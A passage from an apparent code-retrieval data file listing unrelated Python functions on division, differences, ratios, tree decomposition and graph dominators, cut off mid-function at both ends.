flow_link_lengths[node]\n )\n\n else:\n # non-existant links are coded with -1\n useable_receivers = np.where(reciever != grid.BAD_INDEX)[0]\n\n for idx in range(len(useable_receivers)):\n r = reciever[useable_receivers][idx]\n fll = flow_link_lengths[node][useable_receivers][idx]\n\n # if not processing an outlet node.\n if r != node:\n if longest_path:\n cond = distance_to_divide[r] < distance_to_divide[node] + fll\n else:\n cond = distance_to_divide[r] > distance_to_divide[node] + fll\n\n if cond:\n distance_to_divide[r] = distance_to_divide[node] + fll\n\n # store on the grid\n if add_to_grid:\n grid.add_field(\n \"distance_to_divide\", distance_to_divide, at=\"node\", clobber=clobber\n )\n\n return distance_to_divide", "def split_translation(t):\n from math import fmod\n\n def _split1(x):\n x_part = fmod(x, 1.0)\n x_whole = x - x_part\n if x_part > 0.5:\n x_part -= 1\n x_whole += 1\n elif x_part < -0.5:\n x_part += 1\n x_whole -= 1\n\n return (x_whole, x_part)\n\n _tt = [_split1(x) for x in t]\n\n return tuple(t[0] for t in _tt), tuple(t[1] for t in _tt)", "def dif_prog_div(x, y):\n\n dd = np.zeros([len(y), len(y)]) \n dd[0] = y\n dd[1,:-1] = (dd[0,1:] - dd[0,:-1]) / (x[1:]-x[:-1])\n\n for i in range(2,len(y)):\n dd[i,:-i] = (dd[i-1,1:-(i-1)] - dd[i-1,:-i]) / (x[i:]-x[:-i])\n\n return dd", "def alldiff():\n res = {'Computation-alldiff-0': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 1, 'z': 4},\n 'Results': {'f1': 15, 'f2': 51}},\n 'Computation-alldiff-1': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 1, 'z': 4},\n 'Results': {'f1': 16, 'f2': 61}},\n 'Computation-alldiff-2': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 2, 'z': 4},\n 'Results': {'f1': 25, 'f2': 52}},\n 'Computation-alldiff-3': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 2, 'z': 4},\n 'Results': {'f1': 26, 'f2': 62}},\n 'Computation-alldiff-4': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 3, 'z': 4},\n 'Results': {'f1': 35, 'f2': 53}},\n 'Computation-alldiff-5': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 3, 'z': 4},\n 'Results': {'f1': 36, 'f2': 63}}}\n\n # Notice the ordering\n domain = {'x':[\"1\", \"2\", \"3\"], 'w':[\"5\", \"6\"]}\n metadata = {'z':\"4\"}\n parameters = [\"x\", \"w\"]\n parameters.sort()\n metrics = [\"f1\", \"f2\"]\n metrics.sort()\n exp_name = \"alldiff\"\n return exp_name, metadata, parameters, domain, metrics, res", "def division(i, S, Gi, NG):\n\n NGX = [dict() for _ in NG]\n\n C = set()\n\n for v in S:\n c = Gi.node[v]['class']\n NG[i][c].remove(v)\n if not NGX[i].has_key(c):\n NGX[i][c] = set()\n NGX[i][c].add(v)\n C.add(c)\n\n # split class table\n for c in C:\n # copy/move entries of NGX[j] table \n for j in xrange(len(NG)):\n if j == i:\n # remove the entry NG[i] (where S is from) if empty\n if not NG[i][c]:\n del NG[i][c]\n else:\n if NG[i].has_key(c) and NG[i][c]:\n NGX[j][c] = set(NG[j][c])\n else:\n NGX[j][c] = NG[j].pop(c)\n return NGX", "def difference(*colls):\n\n # Get all the leaf paths for each collection: make each path a tuple\n leaf_paths_by_coll = list(map(lambda c: list(map(tuple, get_all_leaf_paths(c))), colls))\n\n # Find the union of all leaf paths: merge all the paths and keep only the unique paths\n union_leaf_paths = list(distinct(concat(*leaf_paths_by_coll)))\n\n # Get the values corresponding to these leaf paths in every collection: if a leaf path doesn't exist, assumes None\n values_by_coll = list(map(lambda lp: list(map(lambda coll: tz.get_in(lp, coll), colls)), union_leaf_paths))\n\n # Filter out the leaf paths that have identical values across the collections\n keep_leaf_paths = list(map(0, filter(lambda t: not allequal(t[1]), zip(union_leaf_paths, values_by_coll))))\n keep_values = list(map(1, filter(lambda t: not allequal(t[1]), zip(union_leaf_paths, values_by_coll))))\n\n # Rearrange to construct a list of dictionaries -- one per original collection.\n # Each of these dictionaries maps a 'kept' leaf path to its corresponding\n # value in the collection\n differences = list(map(lambda vals: dict(zip(keep_leaf_paths, vals)), list(zip(*keep_values))))\n\n return differences", "def compute_divergence(self):\n d_tr_a = []\n d_te_a = []\n for k in self.synth_keys:\n d_tr_a.append(self.divergence('tr', k))\n d_te_a.append(self.divergence('te', k))\n\n training = np.mean(np.array(d_tr_a))\n testing = np.mean(np.array(d_te_a))\n return training, testing", "def _collect_num_denom(ast, nums, denoms):\n if not (isinstance(ast, Mul) or isinstance(ast, Div)):\n # If ast is not multiplication or division, just put it in nums.\n nums.append(ast)\n return\n\n if isinstance(ast.left, Div) or isinstance(ast.left, Mul):\n # If the left argument is a multiplication or division, descend into\n # it, otherwise it is in the numerator.\n _collect_num_denom(ast.left, nums, denoms)\n else:\n nums.append(ast.left)\n\n if isinstance(ast.right, Div) or isinstance(ast.right, Mul):\n # If the left argument is a multiplication or division, descend into\n # it, otherwise it is in the denominator.\n if isinstance(ast, Mul):\n _collect_num_denom(ast.right, nums, denoms)\n elif isinstance(ast, Div):\n # Note that when we descend into the denominator of a Div, we want \n # to swap our nums and denoms lists\n _collect_num_denom(ast.right, denoms, nums)\n else:\n if isinstance(ast, Mul):\n nums.append(ast.right)\n elif isinstance(ast, Div):\n denoms.append(ast.right)", "def extractTree(nodesList, rootNode):\n if len(nodesList) == 0:\n return\n if nodesList[0] == '!':\n return nodesList[1:]\n\n splitAttribute, splitValue, attributeValue = nodesList[0].strip().split('-')\n nodesList = nodesList[1:]\n \n if splitAttribute != splitValue or splitAttribute != '$' or splitValue != '$':\n rootNode.setSplit((splitAttribute, splitValue))\n else:\n rootNode.setSplit(\"Base case\")\n rootNode.setData(attributeValue)\n return nodesList[2:]\n \n \n leftTree = Tree()\n rightTree = Tree()\n rootNode.setLesser(leftTree)\n rootNode.setGreater(rightTree)\n nodesList = extractTree(nodesList, leftTree)\n\n \n \n nodesList = extractTree(nodesList, rightTree)\n\n return nodesList", "def _get_packet_intervals(\n packets: Sequence[Packet],\n node: int,\n getter: Callable[[Packet, int], float]\n) -> np.ndarray:\n prev_time = 0.0\n intervals = []\n for packet in packets:\n if packet.was_served[node]:\n new_time = getter(packet, node)\n intervals.append(new_time - prev_time)\n prev_time = new_time\n return np.asarray(intervals)", "def find_diff_nodes(S,T):\n diff_nodes = []\n for node in S:\n s_formula = S.formula_conj(node)\n t_formula = T.formula_conj(node)\n if s_formula != t_formula:\n diff_nodes.append(node)\n return diff_nodes", "def diff(self,images):\n diffArray = [0,1,2,3]\n\n # compute the difference bewteen two adjacent images in the same ovtave\n for i in range(1,5):\n diffArray[i-1] = images[i]-images[i-1]\n\n return numpy.array(diffArray)", "def divide_list(ld, division):\n buckets = []\n current = []\n for obj in ld:\n if len(current) < division:\n current.append(obj)\n else:\n buckets.append(current)\n current = [obj]\n if len(current) > 0:\n buckets.append(current)\n return buckets", "def cell_division(waitlist, celllist, AgEpitope, tnow, mut_list, RNs):\n for cell in celllist:\n # get list of 0 to 2 daughters\n dlist, mut_list = divide(cell, AgEpitope, tnow, mut_list, RNs)\n # add daughters to waitlist\n waitlist = waitlist + dlist\n return waitlist, mut_list", "def vars_divide ( self , var1 , var2 , name = '' , title = '' ) :\n \n f1 = isinstance ( var1 , num_types )\n f2 = isinstance ( var2 , num_types )\n\n if f1 and f2 :\n res = float ( var1 ) / float ( var2 )\n return ROOT.RooRealConstant.value ( res ) \n elif f1 :\n var1 = ROOT.RooRealConstant.value ( var1 ) \n return self.vars_divide ( var1 , var2 , name , title )\n elif f2 :\n return self.vars_multiply ( var1 , 1.0/var2 , name , title )\n \n self.aux_keep.append ( var1 )\n self.aux_keep.append ( var2 )\n\n result = Ostap.MoreRooFit.Division ( var1 , var2 )\n self.aux_keep.append ( result )\n \n return result", "def divergence(tensor, dx=1, difference='central'):\n assert difference in ('central', 'forward', 'backward'), difference\n rank = spatial_rank(tensor)\n if difference == 'forward':\n return _divergence_nd(tensor, (0, 1)) / dx ** rank\n elif difference == 'backward':\n return _divergence_nd(tensor, (-1, 0)) / dx ** rank\n else:\n return _divergence_nd(tensor, (-1, 1)) / (2 * dx) ** rank", "def difference(G, H):\n\n if G.order() != H.order():\n msg = \"Node sets of the two directed graphs are not equal!\"\n raise StaticGraphNotEqNodesException(msg)\n \n n_nodes = G.order()\n edges = ((u, v) for u in G.nodes()\n for v in set(G.successors(u)) - set(H.successors(u)))\n deg = make_deg(n_nodes, edges)\n edges = ((u, v) for u in G.nodes()\n for v in set(G.successors(u)) - set(H.successors(u)))\n D = make(n_nodes, G.size(), edges, deg)\n return D", "def test_interpolation(self):\n\n ndx1, ndx2 = self.find_partition()\n tessellation = Delaunay(self.grid[ndx2,:])\n\n # initialisation\n results = []\n ndim = self.ndim+1\n\n for j in ndx1:\n nmodels = len(self.tracks[j].models)\n aResult = np.empty((nmodels,ndim+nglb+6),dtype=gtype)\n pt = self.tracks[j].params + [0.0,]\n\n for i in range(nmodels):\n aModel1 = self.tracks[j].models[i]\n pt[-1] = aModel1.glb[iage]\n aModel2 = interpolate_model(self,pt,tessellation,ndx2)\n aResult[i,0:ndim] = pt\n if (aModel2 is None):\n aResult[i,ndim:ndim+nglb+6] = np.nan\n else:\n aResult[i,ndim:ndim+nglb+6] = compare_models(aModel1,aModel2)\n\n results.append(aResult)\n\n return results, ndx1, ndx2, tessellation", "def diffSeries(requestContext, *seriesLists):\n (seriesList,start,end,step) = normalize(seriesLists)\n name = \"diffSeries(%s)\" % formatPathExpressions(seriesList)\n values = ( safeDiff(row) for row in izip(*seriesList) )\n series = TimeSeries(name,start,end,step,values)\n series.pathExpression = name\n return [series]", "def DataDiff(source, target, compare_list_as_value=True, depth=0, no_difference_value=None):\n # Ensure recursion doesnt go out of control\n if depth > 150:\n raise Exception('DataDiff recurlsion depth has hit limit (50), aborting.')\n\n # If we are not working with 2 different containers we can inspect, then do a simple check\n if type(source) not in (list, tuple, dict) or type(target) not in (list, tuple, dict):\n # If the types are different, the data is different (and cant be compared more)\n if type(source) != type(target):\n return (source, target)\n # Else, theyre the same types, if the values are different\n elif source != target:\n return (source, target)\n # Else, theyre the same types and value\n else:\n # This should only happen if this is a fresh DataDiff() call, depth==0\n if depth == 0:\n return (no_difference_value, no_difference_value)\n else:\n raise Exception('This should never happen, having a mismatching value different in anywhere but depth=0')\n\n\n if type(source) in (list, tuple):\n source_diff = []\n elif type(source) == dict:\n source_diff = {}\n else:\n raise Exception('Unhandled source_diff data type: %s' % type(source))\n\n if type(target) in (list, tuple):\n target_diff = []\n elif type(target) == dict:\n target_diff = {}\n else:\n raise Exception('Unhandled target_diff data type: %s' % type(target))\n\n # Check for incompatible types, and just return them both as theyre totally different\n if type(source_diff) != type(target_diff):\n return (source, target)\n\n # If we're handling a Dictionary compare\n if type(source_diff) == dict:\n # Process the source keys first\n for key in source.keys():\n _CompareDictValue(key, source, target, source_diff, target_diff, compare_list_as_value, no_difference_value, depth)\n\n # Process the target keys next, skipping any source keys we already processed\n for key in target.keys():\n # Skip any keys we already processed in source\n if key in source:\n continue\n\n # Reverse target/source, so that the reverse comparison/set is done\n _CompareDictValue(key, target, source, target_diff, source_diff, compare_list_as_value, no_difference_value, depth)\n\n # Else, if we're handling a List compare\n elif type(source_diff) == list:\n # If lists must be compared in total because the order of a list is important\n if compare_list_as_value:\n if source != target:\n return (list(source), list(target))\n\n # Else, compare each element of the list\n else:\n for count in range(0, len(source)):\n if count >= len(target):\n source_diff.append(source[count])\n elif source[count] != target[count]:\n source_diff.append(source[count])\n target_diff.append(target[count])\n\n # If the target has more elements than the source, add the rest \n if len(target) > len(source):\n target_diff += target[-(len(source) - len(target)):]\n\n else:\n raise Exception('Unspecified type handler for data: %s. Only dict and list/tuple types are accepted.')\n\n return (source_diff, target_diff)", "def group_and_vote_fractions():\n group_share = np.array([0, 0.2, 0.4, 0.6, 0.8])\n vote_share = np.array([0, 0.2, 0.4, 0.6, 0.8])\n return group_share, vote_share", "def get_deltas(temps, vals, ts_index):\n nan_array = np.full([len(temps)], np.nan)\n vals_react = nan_array\n vals_ts = nan_array\n vals_prod = nan_array\n # any files before the ts will be a reactant file\n for index in range(len(vals)):\n if index == 0:\n vals_react = vals[index]\n elif index < ts_index:\n vals_react += vals[index]\n elif index == ts_index:\n vals_ts = vals[index]\n elif index == ts_index + 1:\n vals_prod = vals[index]\n else:\n vals_prod += vals[index]\n delta_ts = vals_ts - vals_react\n delta_rxn = vals_prod - vals_react\n return delta_ts, delta_rxn", "def compute(self, node, input_vals):\r\n assert len(input_vals) == 2\r\n return input_vals[0] - input_vals[1]", "def diff_op(self, args: List[float], time: float) -> List[float]:\n v, h_nav, n_kvhh, h_kva, m_kvsi, s_ampar, x_nmdar, s_nmdar, s_gabar, ca = args\n ca_args: List[float] = [v, s_nmdar, ca]\n\n if self.ion:\n self.set_vCa(in_ca=ca)\n\n dvdt: float = self.dvdt(args=args)\n dhNadt: float = self.nav.dhdt(v=v, h=h_nav)\n dnKdt: float = self.kvhh.dndt(v=v, n=n_kvhh)\n dhAdt: float = self.kva.dhdt(v=v, h=h_kva)\n dmKSdt: float = self.kvsi.dmdt(v=v, m=m_kvsi)\n dsAMPAdt: float = self.ampar.dsdt(v=v, s=s_ampar)\n dxNMDAdt: float = self.nmdar.dxdt(v=v, x=x_nmdar)\n dsNMDAdt: float = self.nmdar.dsdt(v=v, s=s_nmdar, x=x_nmdar)\n dsGABAdt: float = self.gabar.dsdt(v=v, s=s_gabar)\n dCadt: float = self.dCadt(args=ca_args)\n return [dvdt, \n dhNadt, \n dnKdt, \n dhAdt, \n dmKSdt,\n dsAMPAdt, \n dxNMDAdt, \n dsNMDAdt, \n dsGABAdt, \n dCadt,\n ]", "def ratio_calculator(numerator, denominator):\n ratios = []\n for i in numerator:\n for j in denominator:\n if i[0] == j[0] and j[1] != 0:\n ratios.append([i[0], round(float(i[1]) / j[1], 3)])\n break\n elif i[0] == j[0]:\n ratios.append([i[0], 0])\n return ratios", "def differences(input_list):\n output_list = []\n for x in range(1,len(input_list)):\n output_list.append(input_list[x]-input_list[x-1])\n return output_list", "def new_decomposition(self):\n from sage.combinat.binary_tree import BinaryTree\n t_low = self.lower_binary_tree().to_tilting()\n t_up = self.upper_binary_tree().to_tilting()\n common = [p for p in t_low if p in t_up]\n\n def extract_tree(x, y, tilt, common):\n \"\"\"\n Extract a tree with root at position xy (recursive).\n \"\"\"\n left_tree = None\n for k in range(y - 1, x, -1):\n if (x, k) in tilt:\n if (x, k) not in common:\n left_tree = extract_tree(x, k, tilt, common)\n break\n right_tree = None\n for k in range(x + 1, y):\n if (k, y) in tilt:\n if (k, y) not in common:\n right_tree = extract_tree(k, y, tilt, common)\n break\n return BinaryTree([left_tree, right_tree])\n\n TIP = self.parent()\n return [TIP.from_binary_trees(extract_tree(cx, cy, t_low, common),\n extract_tree(cx, cy, t_up, common))\n for cx, cy in common]", "def _items_divide(self, numerator_data, denominator_data):\n items = {}\n if numerator_data['items'] is None:\n items = None\n else:\n for n in numerator_data['items']:\n # TODO what should we do when a matching item isn't found?\n matching_d = next((item for item in denominator_data['items'] if\n item['group'] == n['group']),\n {'group': '_unknown', 'value': None})\n if matching_d['value'] is None or n['value'] is None:\n divided = None\n else:\n divided = n['value'] / matching_d['value']\n\n # item = dict({'group': n['group'],\n # 'value': divided})\n items[n['group']] = divided\n\n return {'items': items, 'grouping': numerator_data['grouping'],\n 'data_id': numerator_data['data_id']}", "def splitNodes(matching):\n outer = set(range(self.n))\n inner = set([])\n for (u, v) in matching:\n if u in outer:\n outer.remove(u)\n if v in outer:\n outer.remove(v)\n inner.add(u)\n inner.add(v)\n return list(inner), list(outer)", "def group_diff(options, db):\n nested_rvals = []\n for ip in options.gmp:\n nested_rvals.append(get_ip_parents(ip, db))\n # get just the list of groups, stripping out the networks.\n group1 = [x[0] for x in nested_rvals[0]]\n group2 = [x[0] for x in nested_rvals[1]]\n common = sorted(list(set(group1) & set(group2)))\n diff1 = sorted(list(set(group1) - set(group2)))\n diff2 = sorted(list(set(group2) - set(group1)))\n return common, diff1, diff2", "def get_ratios(L1, L2):\r\n ratios = []\r\n for index in range(len(L1)):\r\n try:\r\n ratios.append(L1[index]/float(L2[index]))\r\n except ZeroDivisionError:\r\n ratios.append(float('NaN')) #NaN = not a number\r\n except:\r\n raise ValueError('get_ratios called with bad arg')\r\n return ratios", "def diff_eq(self,x,t,par):\n \n # setting the functions\n s = x[0]\n i = x[1]\n r = x[2]\n d = x[3]\n \n # mathematical equations\n DiffS = -par[1]*(s/10**par[4])*(i**par[0])\n DiffI = (par[1]*(s/10**par[4]) - par[2] - par[3])*(i**par[0])\n DiffR = par[2]*(i**par[0])\n DiffD = par[3]*(i**par[0])\n \n return [DiffS,DiffI,DiffR,DiffD]", "def sub_division(width: float, minimum_division: float, stretch_factor: float) -> list:\n\n sum_x = 0\n next_ = minimum_division\n new_grid = []\n max_dx = 20/100\n x = width/2\n\n while sum_x < x:\n remaining = x - sum_x\n\n if next_ > max_dx:\n n = np.ceil(remaining/max_dx)\n\n if n == 0:\n new_grid.append(remaining)\n\n next_ = remaining/n\n\n for _ in range(0, int(n)):\n new_grid.append(next_)\n sum_x += next_\n\n remaining = x - sum_x\n\n if next_ < remaining:\n new_grid.append(next_)\n sum_x += next_\n else:\n remaining += new_grid[-1]\n new_grid[-1] = remaining/2\n new_grid.append(remaining/2)\n sum_x = x\n\n next_ = next_ * stretch_factor\n\n x1 = new_grid[::-1]\n x2 = new_grid+x1\n\n return x2", "def convert_elemwise_div(node, **kwargs):\n return create_basic_op_node('Div', node, kwargs)", "def multi_dec(f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n args = args[0] if len(args) == 1 and isinstance(args[0], (list, tuple)) else args\n for arg in args:\n if isinstance(arg, Node) and arg.parent.name is 'root':\n arg.parent.remove_child(arg)\n arg.update_child_calls()\n return f(*args, **kwargs)\n return wrapper", "def _floatdiff(x, y):\n rankx = _rank(x)\n ranky = _rank(y)\n return _diff(rankx, ranky)", "def test_dividing(self):\n divider = Divider()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n if j != 0:\n self.assertEqual(i/j, divider.calc(j, i))", "def split_validation_data(*data, divmod=0.5):\n n = round((len(data[0]) - 1) * divmod)\n return [(d[n:], d[:n]) for d in data]", "def eval_numerical_gradient_blobs(f, inputs, output, h=1e-5):\n numeric_diffs = []\n for input_blob in inputs:\n diff = np.zeros_like(input_blob.diffs)\n it = np.nditer(input_blob.vals, flags=['multi_index'],\n op_flags=['readwrite'])\n while not it.finished:\n idx = it.multi_index\n orig = input_blob.vals[idx]\n\n input_blob.vals[idx] = orig + h\n f(*(inputs + (output,)))\n pos = np.copy(output.vals)\n input_blob.vals[idx] = orig - h\n f(*(inputs + (output,)))\n neg = np.copy(output.vals)\n input_blob.vals[idx] = orig\n\n diff[idx] = np.sum((pos - neg) * output.diffs) / (2.0 * h)\n\n it.iternext()\n numeric_diffs.append(diff)\n return numeric_diffs", "def _get_nums_from_fractions(self, nums):\n\t\tnums_fraction = []\n\n\t\tfor num in nums:\n\t\t\tif re.search(\"\\d*\\(\\d+/\\d+\\)\\d*\", num):\n\t\t\t\tnums_fraction.append(num)\n\t\tnums_fraction = sorted(nums_fraction, key=lambda x: len(x), reverse=True)\n\n\t\tfloat_nums = []\n\t\tfor num in nums:\n\t\t\tif ',' in num:\n\t\t\t\t# [TODO] It can be points with comma like (0, 1)...\n\t\t\t\tnew_num = []\n\t\t\t\tfor c in num:\n\t\t\t\t\tif c == ',':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_num.append(c)\n\t\t\t\tnum = ''.join(new_num)\n\t\t\t\tfloat_num = num\n\t\t\telse:\n\t\t\t\tfloat_num = num\n\n\t\t\ttry:\n\t\t\t\tfloat_nums.append(str(float(eval(float_num))))\n\t\t\texcept:\n\t\t\t\tif float_num.startswith('0'):\n\t\t\t\t\twhile float_num.startswith('0'):\n\t\t\t\t\t\tfloat_num = float_num[1:]\n\t\t\t\t\tfloat_nums.append(str(float(eval(float_num))))\n\n\t\tfloat_nums_fraction = []\n\t\tfor num in nums_fraction:\n\t\t\tif ',' in num:\n\t\t\t\tnew_num = []\n\t\t\t\tfor c in num:\n\t\t\t\t\tif c == ',':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_num.append(c)\n\t\t\t\tnum = ''.join(new_num)\n\t\t\t\tfloat_nums_fraction.append(str(float(eval(num))))\n\t\t\telse:\n\t\t\t\tfloat_nums_fraction.append(str(float(eval(num))))\n\n\t\treturn float_nums, float_nums_fraction", "def decompose_paths(self):\n if self.child_nodes == {}:\n return []\n\n import numpy as np\n\n def decompose_paths_rec(node_inner, path):\n \"\"\"\n This function does the recursive create_path of the decomposition\n :param node_inner:\n :param path:\n \"\"\"\n if node_inner.is_leaf():\n path = np.append(path, str(node_inner.value))\n return path[None]\n else:\n paths = np.array([])\n for edge_name in node_inner.child_nodes:\n new_path = np.append(path, str(edge_name))\n paths = np.append(paths, decompose_paths_rec(node_inner.child_nodes[edge_name], new_path))\n return paths\n\n decomposition = decompose_paths_rec(self, np.array([]))\n return decomposition.reshape((decomposition.shape[0]/(self.d+1), self.d+1))", "def compute_relations(nodes: List[Node]) -> None:\n # Calculate parents\n for node in nodes:\n node.parents = []\n for node in nodes:\n for child in node.children():\n child.parents.append(node)\n\n def compute_dominators(\n entry: Node,\n parents: Callable[[Node], List[Node]],\n dominators: Callable[[Node], Set[Node]],\n immediately_dominates: Callable[[Node], List[Node]],\n set_immediate_dominator: Callable[[Node, Optional[Node]], None],\n ) -> None:\n # See https://en.wikipedia.org/wiki/Dominator_(graph_theory)#Algorithms\n # Note: if `n` is unreachable from `entry`, then *every* node will\n # vacuously belong to `n`'s dominator set.\n for n in nodes:\n dominators(n).clear()\n if n == entry:\n dominators(n).add(n)\n else:\n dominators(n).update(nodes)\n\n changes = True\n while changes:\n changes = False\n for node in nodes:\n if node == entry:\n continue\n nset = dominators(node)\n for parent in parents(node):\n nset = nset.intersection(dominators(parent))\n nset.add(node)\n if len(nset) < len(dominators(node)):\n assert nset.issubset(dominators(node))\n dominators(node).intersection_update(nset)\n changes = True\n\n # Compute immediate dominator, and the inverse relation\n for node in nodes:\n immediately_dominates(node).clear()\n for node in nodes:\n doms = dominators(node).difference({node})\n # If `node == entry` or the flow graph is not reducible, `doms` may be empty.\n # TODO: Infinite loops could be made reducible by introducing\n # branches like `if (false) { return; }` without breaking semantics\n if doms:\n # There should be a unique max `len(dominators(d))` if the flowgraph\n # is reducible. Fall back to largest index for irreducible graphs.\n imdom = max(doms, key=lambda d: (len(dominators(d)), d.block.index))\n immediately_dominates(imdom).append(node)\n set_immediate_dominator(node, imdom)\n else:\n set_immediate_dominator(node, None)\n for node in nodes:\n immediately_dominates(node).sort(key=lambda x: x.block.index)\n\n def _set_immediate_dominator(node: Node, imdom: Optional[Node]) -> None:\n node.immediate_dominator = imdom\n\n def _set_immediate_postdominator(node: Node, impdom: Optional[Node]) -> None:\n node.immediate_postdominator = impdom\n\n entry = nodes[0]\n terminal = nodes[-1]\n assert isinstance(terminal, TerminalNode)\n\n # Compute dominators & immediate dominators\n compute_dominators(\n entry=entry,\n parents=lambda n: n.parents,\n dominators=lambda n: n.dominators,\n immediately_dominates=lambda n: n.immediately_dominates,\n set_immediate_dominator=_set_immediate_dominator,\n )\n\n # Compute postdominators & immediate postdominators\n # This uses the same algorithm as above, but with edges reversed\n compute_dominators(\n entry=terminal,\n parents=lambda n: n.children(),\n dominators=lambda n: n.postdominators,\n immediately_dominates=lambda n: n.immediately_postdominates,\n set_immediate_dominator=_set_immediate_postdominator,\n )\n\n # Iterate over all edges n -> c and check for backedges, which define natural loops\n for node in nodes:\n for child in node.children():\n if child not in node.dominators:\n continue\n # Found a backedge node -> child where child dominates node; child is the \"head\" of the loop\n if child.loop is None:\n child.loop = NaturalLoop(child)\n child.loop.nodes |= {child, node}\n child.loop.backedges.add(node)\n for parent in nodes:\n if reachable_without(parent, node, child):\n child.loop.nodes.add(parent)", "def compare_trees(first_soup: HTMLStrip, second_soup: HTMLStrip) -> float:\n first_tree = Tree.from_soup_object(first_soup.file_name, first_soup.original_soup)\n second_tree = Tree.from_soup_object(second_soup.file_name, second_soup.original_soup)\n\n common_paths_size: int = first_tree.num_of_common_paths(second_tree)\n target_size: int = second_tree.total_num_of_paths()\n similarity = float(common_paths_size)*100/target_size\n print(f'{similarity:.2f}')\n return similarity", "def _group_nodes(cls, nodes, node_info_holder):\n group_nodes = [[]]\n kb_nodes = []\n for n in nodes:\n matched_scope = []\n if n.name in node_info_holder.nodes_keep:\n kb_nodes.append(n)\n continue\n for scope in node_info_holder.scopes:\n if scope in n.name and n.name[n.name.find(scope) + len(scope)] == \"/\":\n matched_scope.append(scope)\n if len(matched_scope) > 1:\n raise ValueError(\n \"More than one scope {} contained in node name {}.\".format(\n str(matched_scope), n.name))\n if matched_scope:\n curr_scope = matched_scope[0]\n if group_nodes[-1]:\n group_nodes.append(curr_scope)\n group_nodes.append([])\n node_info_holder.nodes[curr_scope].append(n)\n else:\n group_nodes[-1].append(n)\n return group_nodes, kb_nodes", "def arithmeticDivision2(numbers,str_result,target):\n success = False\n str_temp=\"\"\n for x in numbers:\n if x%target==0:\n target2=x//target\n numbers.remove(x)\n numbers,str_temp,success=arithmeticBasic(numbers,str_temp,target2)\n if success:\n str_result+=str(x)+'/('+str_temp+')'\n numbers.clear()\n numbers.append(target)\n break\n else:\n numbers.insert(0,x)\n return numbers,str_result,success", "def find_step(tree: Tree, template: Tree) -> list:\n if template == \"@\":\n if type(tree) == str:\n return [tree]\n return tree.leaves()\n\n if template == '*':\n return []\n\n if type(template) != str and template.label() == '*':\n res_star = []\n for temp_node in template:\n res_star.extend(find_star_step(tree, temp_node))\n return res_star\n\n if type(tree) == str or type(template) == str:\n if tree == template:\n return []\n return []\n\n if tree.label() != template.label():\n return []\n else:\n\n res = []\n for t_node in template:\n for node in get_node_by_label(tree, t_node):\n res.extend(find_step(node, t_node))\n return res", "def testListDivide():\n listDivide([1, 2, 3, 4, 5])\n listDivide([2, 4, 6, 8, 10])\n listDivide([30, 54, 63, 98, 100], divide=10)\n listDivide([])\n listDivide([1, 2, 3, 4, 5], 1)", "def diff(*args):\n return reduce(lambda x, y: x - y, args)", "def diff(self, da, axis):\n\n def interp_function(data_left, data_right, shift):\n # linear, centered interpolation\n # TODO: generalize to higher order interpolation\n return shift*(data_right - data_left)\n return self._neighbor_binary_func(da, axis, interp_function)", "def test_scalar_division(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = a1 / 2\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def get_resulting_diffs():\n diff_dirpath = application.join_abs_path(\n EMPTY_TEST_DIR, application.OUTPUT_DIR_NAME)\n diffleft_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_LEFT_FILENAME)\n diffright_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_RIGHT_FILENAME)\n\n diff_left = read_gzip_file_lines_into_set(diffleft_filename)\n diff_right = read_gzip_file_lines_into_set(diffright_filename)\n\n return diff_left, diff_right", "def _divide(triangle, points):\n a, b, c = triangle\n\n # Insert points midway along each side of the triangle.\n # Form 3 new triangles.\n new_vertices = [\n _midpoint(points[a], points[b]),\n _midpoint(points[b], points[c]),\n _midpoint(points[c], points[a]),\n ]\n\n new_vertices_indices = [\n len(points),\n len(points) + 1,\n len(points) + 2,\n ]\n\n new_triangles = [\n (a, new_vertices_indices[0], new_vertices_indices[2]),\n (b, new_vertices_indices[1], new_vertices_indices[0]),\n (c, new_vertices_indices[2], new_vertices_indices[1]),\n ]\n\n return new_vertices, new_triangles", "def testListDivide():\n #a\n numbers = [1,2,3,4,5]\n expected = 2\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\")\n \n \n #b\n numbers = [2,4,6,8,10]\n expected = 5\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #c\n numbers = [30, 54, 63, 98, 100]\n divide = 10\n expected = 2\n \n try:\n assert listDivide(numbers, divide) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #d\n numbers = []\n expected = 0\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #e\n numbers = [1, 2, 3, 4, 5]\n divide = 1\n expected = 5\n \n try:\n assert listDivide(numbers, divide) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\")", "def compute_tree_changes(dmt_new, dmt_old, directory_path=''):\n updated, new, deleted = set(), set(), set()\n # Base cases:\n # Both files or empty directories\n if (not dmt_new.children) and (not dmt_old.children):\n return updated, new, deleted\n # New directory\n elif not dmt_old.children:\n mutual_filesystem_items = set()\n new_filesystem_items = set(dmt_new.children.keys())\n deleted_filesystem_items = set()\n elif not dmt_new.children:\n mutual_filesystem_items = set()\n new_filesystem_items = set()\n deleted_filesystem_items = set(dmt_old.children.keys())\n else:\n mutual_filesystem_items = set(dmt_new.children.keys()).intersection(set(dmt_old.children.keys()))\n new_filesystem_items = set(dmt_new.children.keys()).difference(set(dmt_old.children.keys()))\n deleted_filesystem_items = set(dmt_old.children.keys()).difference(set(dmt_new.children.keys()))\n \n \n # Compile the set of updated files and directories, as well as any other changes within subdirectories.\n for filesystem_item in 